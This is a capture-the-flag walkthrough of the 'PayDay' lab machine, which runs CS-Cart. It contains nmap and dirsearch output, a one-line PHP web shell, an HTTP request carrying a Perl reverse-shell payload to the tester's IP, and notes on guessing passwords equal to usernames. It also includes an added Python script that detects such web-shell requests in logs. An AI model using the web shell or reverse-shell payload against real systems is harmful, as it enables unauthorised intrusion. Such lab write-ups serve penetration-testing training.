PayDay Intermediate
nmap + dirsearch: discover the web site and enumerate its directories
┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A 192.168.167.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 06:56 UTC
Nmap scan report for 192.168.167.39
Host is up (0.072s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open pop3 Dovecot pop3d
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_pop3-capabilities: CAPA STLS SASL RESP-CODES TOP PIPELINING UIDL
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imapd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_imap-capabilities: LITERAL+ completed STARTTLS IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT LOGINDISABLEDA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: LITERAL+ completed IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT AUTH=PLAINA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN) USER RESP-CODES TOP PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: payday
| NetBIOS computer name:
| Domain name:
| FQDN: payday
|_ System time: 2024-11-09T01:57:50-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 50m06s, deviation: 2h02m28s, median: 6s
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 69.91 ms 192.168.45.1
2 69.83 ms 192.168.45.254
3 72.32 ms 192.168.251.1
4 72.42 ms 192.168.167.39
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.40 seconds
┌──(root㉿kali)-[/home/ftpuserr]
└─# dirsearch -u http://192.168.167.39/
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/ftpuserr/reports/http_192.168.167.39/__24-11-09_07-00-23.txt
Target: http://192.168.167.39/
[07:00:23] Starting:
[07:00:28] 403 - 311B - /.ht_wsr.txt
[07:00:28] 403 - 314B - /.htaccess.orig
[07:00:28] 403 - 314B - /.htaccess.bak1
[07:00:28] 403 - 316B - /.htaccess.sample
[07:00:28] 403 - 312B - /.htaccessOLD
[07:00:28] 403 - 314B - /.htaccess_orig
[07:00:28] 403 - 312B - /.htaccessBAK
[07:00:28] 403 - 312B - /.htaccess_sc
[07:00:28] 403 - 315B - /.htaccess_extra
[07:00:28] 403 - 314B - /.htaccess.save
[07:00:28] 403 - 313B - /.htaccessOLD2
[07:00:28] 403 - 305B - /.html
[07:00:28] 403 - 304B - /.htm
[07:00:28] 403 - 310B - /.htpasswds
[07:00:28] 403 - 314B - /.htpasswd_test
[07:00:28] 403 - 311B - /.httr-oauth
[07:00:35] 301 - 335B - /addons -> http://192.168.167.39/addons/
[07:00:35] 200 - 2KB - /admin
[07:00:35] 200 - 2KB - /admin.php
[07:00:36] 200 - 2KB - /admin/_logs/access.log
[07:00:36] 200 - 2KB - /admin/.config
[07:00:36] 200 - 2KB - /admin/.htaccess
[07:00:36] 200 - 2KB - /admin/%3bindex/
[07:00:36] 200 - 2KB - /admin/_logs/error.log
[07:00:36] 200 - 2KB - /admin/_logs/access-log
[07:00:36] 200 - 2KB - /admin/_logs/error-log
[07:00:36] 200 - 2KB - /admin/access.log
[07:00:36] 200 - 2KB - /admin/_logs/login.txt
[07:00:36] 200 - 2KB - /admin/
[07:00:36] 200 - 2KB - /admin/account.php
[07:00:36] 200 - 2KB - /admin/_logs/err.log
[07:00:36] 200 - 2KB - /admin/account
[07:00:36] 200 - 2KB - /admin/account.jsp
[07:00:36] 200 - 2KB - /admin/account.html
[07:00:36] 200 - 2KB - /admin/admin-login.php
[07:00:36] 200 - 2KB - /admin/account.aspx
[07:00:36] 200 - 2KB - /admin/admin-login
[07:00:36] 200 - 2KB - /admin/admin-login.aspx
[07:00:36] 200 - 2KB - /admin/account.js
[07:00:37] 200 - 2KB - /admin/admin-login.jsp
[07:00:37] 200 - 2KB - /admin/admin-login.html
[07:00:37] 200 - 2KB - /admin/admin.php
[07:00:37] 200 - 2KB - /admin/admin.aspx
[07:00:37] 200 - 2KB - /admin/admin.html
[07:00:37] 200 - 2KB - /admin/admin-login.js
[07:00:37] 200 - 2KB - /admin/admin/login
[07:00:37] 200 - 2KB - /admin/admin.jsp
[07:00:37] 200 - 2KB - /admin/admin.js
[07:00:37] 200 - 2KB - /admin/admin_login
[07:00:37] 200 - 2KB - /admin/admin_login.php
[07:00:37] 200 - 2KB - /admin/admin_login.aspx
[07:00:37] 200 - 2KB - /admin/admin_login.html
[07:00:37] 200 - 2KB - /admin/admin_login.jsp
[07:00:37] 200 - 2KB - /admin/admin_login.js
[07:00:37] 200 - 2KB - /admin/adminer.php
[07:00:37] 200 - 2KB - /admin/adminLogin
[07:00:37] 200 - 2KB - /admin/adminLogin.php
[07:00:37] 200 - 2KB - /admin/adminLogin.aspx
[07:00:37] 200 - 2KB - /admin/adminLogin.jsp
[07:00:37] 200 - 2KB - /admin/adminLogin.html
[07:00:37] 200 - 2KB - /admin/adminLogin.js
[07:00:37] 200 - 2KB - /admin/backup/
[07:00:37] 200 - 2KB - /admin/backups/
[07:00:37] 200 - 2KB - /admin/config.php
[07:00:37] 200 - 2KB - /admin/controlpanel
[07:00:37] 200 - 2KB - /admin/controlpanel.php
[07:00:37] 200 - 2KB - /admin/controlpanel.aspx
[07:00:37] 200 - 2KB - /admin/controlpanel.jsp
[07:00:37] 200 - 2KB - /admin/controlpanel.html
[07:00:37] 200 - 2KB - /admin/controlpanel.js
[07:00:37] 200 - 2KB - /admin/cp
[07:00:38] 200 - 2KB - /admin/cp.php
[07:00:38] 200 - 2KB - /admin/cp.aspx
[07:00:38] 200 - 2KB - /admin/cp.jsp
[07:00:38] 200 - 2KB - /admin/cp.html
[07:00:38] 200 - 2KB - /admin/cp.js
[07:00:38] 200 - 2KB - /admin/data/autosuggest
[07:00:38] 200 - 2KB - /admin/default
[07:00:38] 200 - 2KB - /admin/db/
[07:00:38] 200 - 2KB - /admin/default.asp
[07:00:38] 200 - 2KB - /admin/default/admin.asp
[07:00:38] 200 - 2KB - /admin/default/login.asp
[07:00:38] 200 - 2KB - /admin/download.php
[07:00:38] 200 - 2KB - /admin/dumper/
[07:00:38] 200 - 2KB - /admin/error.log
[07:00:38] 200 - 2KB - /admin/error.txt
[07:00:38] 200 - 2KB - /admin/error_log
[07:00:38] 200 - 2KB - /admin/errors.log
[07:00:38] 200 - 2KB - /admin/export.php
[07:00:38] 200 - 2KB - /admin/FCKeditor
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[07:00:38] 200 - 2KB - /admin/file.php
[07:00:38] 200 - 2KB - /admin/files.php
[07:00:38] 200 - 2KB - /admin/heapdump
[07:00:39] 200 - 2KB - /admin/home
[07:00:39] 200 - 2KB - /admin/home.php
[07:00:39] 200 - 2KB - /admin/home.aspx
[07:00:39] 200 - 2KB - /admin/home.jsp
[07:00:39] 200 - 2KB - /admin/home.html
[07:00:39] 200 - 2KB - /admin/home.js
[07:00:39] 200 - 2KB - /admin/includes/configure.php~
[07:00:39] 200 - 2KB - /admin/index
[07:00:39] 200 - 2KB - /admin/index.php
[07:00:39] 200 - 2KB - /admin/index.aspx
[07:00:39] 200 - 2KB - /admin/index.html
[07:00:39] 200 - 2KB - /admin/index.jsp
[07:00:39] 200 - 2KB - /admin/index.js
[07:00:39] 200 - 2KB - /admin/js/tiny_mce
[07:00:39] 200 - 2KB - /admin/js/tinymce
[07:00:39] 200 - 2KB - /admin/js/tinymce/
[07:00:39] 200 - 2KB - /admin/js/tiny_mce/
[07:00:39] 200 - 2KB - /admin/log
[07:00:39] 200 - 2KB - /admin/log/error.log
[07:00:39] 200 - 2KB - /admin/login
[07:00:39] 200 - 2KB - /admin/login.php
[07:00:39] 200 - 2KB - /admin/login.aspx
[07:00:39] 200 - 2KB - /admin/login.jsp
[07:00:39] 200 - 2KB - /admin/login.html
[07:00:39] 200 - 2KB - /admin/login.js
[07:00:39] 200 - 2KB - /admin/login.asp
[07:00:39] 200 - 2KB - /admin/login.do
[07:00:39] 200 - 2KB - /admin/login.htm
[07:00:39] 200 - 2KB - /admin/login.py
[07:00:39] 200 - 2KB - /admin/login.rb
[07:00:39] 200 - 2KB - /admin/logon.jsp
[07:00:40] 200 - 2KB - /admin/logs/
[07:00:40] 200 - 2KB - /admin/logs/access.log
[07:00:40] 200 - 2KB - /admin/logs/access_log
[07:00:40] 200 - 2KB - /admin/logs/access-log
[07:00:40] 200 - 2KB - /admin/logs/err.log
[07:00:40] 200 - 2KB - /admin/logs/error-log
[07:00:40] 200 - 2KB - /admin/logs/error.log
[07:00:40] 200 - 2KB - /admin/logs/error_log
[07:00:40] 200 - 2KB - /admin/logs/errors.log
[07:00:40] 200 - 2KB - /admin/logs/login.txt
[07:00:40] 200 - 2KB - /admin/manage
[07:00:40] 200 - 2KB - /admin/manage.asp
[07:00:40] 200 - 2KB - /admin/manage/admin.asp
[07:00:40] 200 - 2KB - /admin/manage/login.asp
[07:00:40] 200 - 2KB - /admin/mysql/
[07:00:40] 200 - 2KB - /admin/mysql/index.php
[07:00:40] 200 - 2KB - /admin/mysql2/index.php
[07:00:40] 200 - 2KB - /admin/phpMyAdmin
[07:00:40] 200 - 2KB - /admin/phpMyAdmin/
[07:00:40] 200 - 2KB - /admin/phpmyadmin/
[07:00:40] 200 - 2KB - /admin/phpMyAdmin/index.php
[07:00:40] 200 - 2KB - /admin/phpmyadmin/index.php
[07:00:40] 200 - 2KB - /admin/pMA/
[07:00:40] 200 - 2KB - /admin/phpmyadmin2/index.php
[07:00:40] 200 - 2KB - /admin/pma/
[07:00:40] 200 - 2KB - /admin/PMA/index.php
[07:00:40] 200 - 2KB - /admin/pma/index.php
[07:00:40] 200 - 2KB - /admin/pol_log.txt
[07:00:40] 200 - 2KB - /admin/private/logs
[07:00:40] 200 - 2KB - /admin/portalcollect.php?f=http://xxx&t=js
[07:00:40] 200 - 2KB - /admin/release
[07:00:40] 200 - 2KB - /admin/scripts/fckeditor
[07:00:40] 200 - 2KB - /admin/secure/logon.jsp
[07:00:40] 200 - 2KB - /admin/signin
[07:00:40] 200 - 2KB - /admin/sqladmin/
[07:00:41] 200 - 2KB - /admin/sxd/
[07:00:41] 200 - 2KB - /admin/sysadmin/
[07:00:41] 200 - 2KB - /admin/tiny_mce
[07:00:41] 200 - 2KB - /admin/tinymce
[07:00:41] 200 - 2KB - /admin/upload.php
[07:00:41] 200 - 2KB - /admin/uploads.php
[07:00:41] 200 - 2KB - /admin/user_count.txt
[07:00:41] 200 - 2KB - /admin/views/ajax/autocomplete/user/a
[07:00:41] 200 - 2KB - /admin/web/
[07:00:41] 200 - 2KB - /admin/_logs/error_log
[07:00:41] 200 - 2KB - /admin/admin
[07:00:41] 200 - 2KB - /admin/access.txt
[07:00:41] 200 - 2KB - /admin/access_log
[07:00:41] 200 - 2KB - /admin/_logs/access_log
[07:00:50] 301 - 336B - /catalog -> http://192.168.167.39/catalog/
[07:00:50] 403 - 308B - /cgi-bin/
[07:00:51] 301 - 336B - /classes -> http://192.168.167.39/classes/
[07:00:51] 200 - 2KB - /classes/
[07:00:52] 200 - 13B - /config
[07:00:52] 200 - 13B - /config.php
[07:00:52] 200 - 13B - /config/aws.yml
[07:00:52] 200 - 13B - /config/apc.php
[07:00:52] 200 - 13B - /config/
[07:00:52] 200 - 13B - /config/app.php
[07:00:52] 200 - 13B - /config/database.yml.pgsql
[07:00:52] 200 - 13B - /config/AppData.config
[07:00:52] 200 - 13B - /config/config.inc
[07:00:52] 200 - 13B - /config/app.yml
[07:00:52] 200 - 13B - /config/autoload/
[07:00:52] 200 - 13B - /config/banned_words.txt
[07:00:52] 200 - 13B - /config/database.yml.sqlite3
[07:00:52] 200 - 13B - /config/config.ini
[07:00:52] 200 - 13B - /config/database.yml~
[07:00:52] 200 - 13B - /config/db.inc
[07:00:52] 200 - 13B - /config/master.key
[07:00:52] 200 - 13B - /config/initializers/secret_token.rb
[07:00:52] 200 - 13B - /config/database.yml
[07:00:52] 200 - 13B - /config/databases.yml
[07:00:52] 200 - 13B - /config/development/
[07:00:52] 200 - 13B - /config/monkcheckout.ini
[07:00:52] 200 - 13B - /config/monkdonate.ini
[07:00:52] 200 - 13B - /config/monkid.ini
[07:00:52] 200 - 13B - /config/routes.yml
[07:00:52] 200 - 13B - /config/producao.ini
[07:00:52] 200 - 13B - /config/settings.inc
[07:00:52] 200 - 13B - /config/settings.ini
[07:00:52] 200 - 13B - /config/settings.local.yml
[07:00:52] 200 - 13B - /config/settings/production.yml
[07:00:52] 200 - 13B - /config/settings.ini.cfm
[07:00:52] 200 - 13B - /config/site.php
[07:00:52] 200 - 13B - /config/xml/
[07:00:53] 301 - 333B - /core -> http://192.168.167.39/core/
[07:00:56] 403 - 308B - /doc/api/
[07:00:56] 403 - 304B - /doc/
[07:00:56] 403 - 319B - /doc/html/index.html
[07:00:56] 403 - 318B - /doc/stable.version
[07:00:56] 403 - 319B - /doc/en/changes.html
[07:01:01] 200 - 2KB - /image
[07:01:01] 302 - 0B - /images/ -> ../index.php
[07:01:01] 301 - 335B - /images -> http://192.168.167.39/images/
[07:01:01] 200 - 2KB - /image.php
[07:01:02] 302 - 0B - /include/ -> ../index.php
[07:01:02] 301 - 336B - /include -> http://192.168.167.39/include/
[07:01:02] 200 - 13B - /init/
[07:01:02] 200 - 8KB - /install.php
[07:01:02] 200 - 8KB - /install
[07:01:02] 200 - 8KB - /install.php?profile=default
[07:01:03] 200 - 8KB - /install/
[07:01:03] 200 - 8KB - /install/update.log
[07:01:03] 200 - 8KB - /install/index.php?upgrade/
[07:01:11] 301 - 337B - /payments -> http://192.168.167.39/payments/
[07:01:18] 403 - 313B - /server-status
[07:01:18] 403 - 314B - /server-status/
[07:01:20] 301 - 334B - /skins -> http://192.168.167.39/skins/
[07:01:24] 200 - 1B - /Thumbs.db
[07:01:27] 301 - 332B - /var -> http://192.168.167.39/var/
[07:01:27] 302 - 0B - /var/ -> ../index.php
Every path under /admin/ and /config/ comes back with the same size (2KB and 13B respectively), so those are catch-all responses rather than real files; the genuine directories are the 301 redirects (/addons, /catalog, /classes, /core, /images, /include, /payments, /skins, /var), and /install.php is still reachable.
Searched for an exploit and found the vulnerability: https://www.exploit-db.com/exploits/48891
Upload malicious PHP code
shell.php
<?php system($_POST['a']); phpinfo(); ?>
Get a shell
POST /skins/shell.phtml HTTP/1.1
Host: 192.168.167.39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Origin: http://192.168.167.39
Connection: close
Referer: http://192.168.167.39/skins/shell.phtml
Cookie: csid=0987b3764a00652a88016ad828f35ce6; cart_languageC=EN; secondary_currencyC=usd; acsid=f3235d2078570cbfa48c5cf576165f24; cart_languageA=EN; secondary_currencyA=usd
Upgrade-Insecure-Requests: 1
a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'
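As an added example (not part of the original writeup): the upload above only matters because Apache executes a .phtml file under /skins/, a directory that should serve static content only. This Python helper flags such requests in Apache combined-format access logs; the sample log lines, the static-directory list and the script-extension list are constructed assumptions.

```python
import re
from collections import Counter

# Apache combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve static content and the extensions
# Apache may hand to the PHP handler. Both lists are assumptions for this
# example; .phtml is the extension the request above used.
STATIC_DIRS = ("/skins/", "/images/", "/var/")
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")

def is_script_in_static_dir(path: str) -> bool:
    """True when a URL path points at a PHP-family file under a static-only directory."""
    path = path.split("?", 1)[0].lower()
    return path.startswith(STATIC_DIRS) and path.endswith(SCRIPT_EXT)

def find_webshell_hits(lines):
    """Return (ip, method, path, status) for each request that reached a script
    in a static directory. A 200 means the server actually ran the file; the
    command itself travels in the POST body, which the access log never shows."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if is_script_in_static_dir(m["path"]):
            hits.append((m["ip"], m["method"], m["path"], int(m["status"])))
    return hits

def summarize(hits):
    """Count hits per (source IP, path) so repeated POSTs to one file stand out."""
    return Counter((ip, path) for ip, _method, path, _status in hits)

# Constructed sample log lines modelled on the request shown above.
SAMPLE_LOG = [
    '192.168.45.250 - - [09/Nov/2024:07:05:01 +0000] "GET /skins/basic/customer/styles.css HTTP/1.1" 200 1456',
    '192.168.45.250 - - [09/Nov/2024:07:05:10 +0000] "GET /skins/shell.phtml HTTP/1.1" 200 41234',
    '192.168.45.250 - - [09/Nov/2024:07:05:12 +0000] "POST /skins/shell.phtml HTTP/1.1" 200 41234',
    '192.168.45.250 - - [09/Nov/2024:07:05:13 +0000] "POST /skins/shell.phtml HTTP/1.1" 200 41234',
    '10.0.0.7 - - [09/Nov/2024:07:06:00 +0000] "GET /index.php?dispatch=products.view HTTP/1.1" 200 22310',
    '10.0.0.7 - - [09/Nov/2024:07:06:02 +0000] "GET /images/logo.png HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for (ip, path), n in summarize(find_webshell_hits(SAMPLE_LOG)).items():
        print(f"{ip} -> {path}: {n} request(s)")
```

The matching server-side fix is to remove PHP handlers from skin and upload directories so a dropped file is served as text instead of executed.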
Get a full TTY, then privilege escalation
I spent a long time here and could not figure out how to escalate.
I checked the database, checked SUID binaries, checked everything, and still had nothing.
Only after reading a walkthrough did I learn:
admin:admin, customer:customer: the passwords in the database are the same as the usernames, so the blind guess is that each password equals its username.
Log in as the user partick
partick:patricke
Found that sudo can run any command.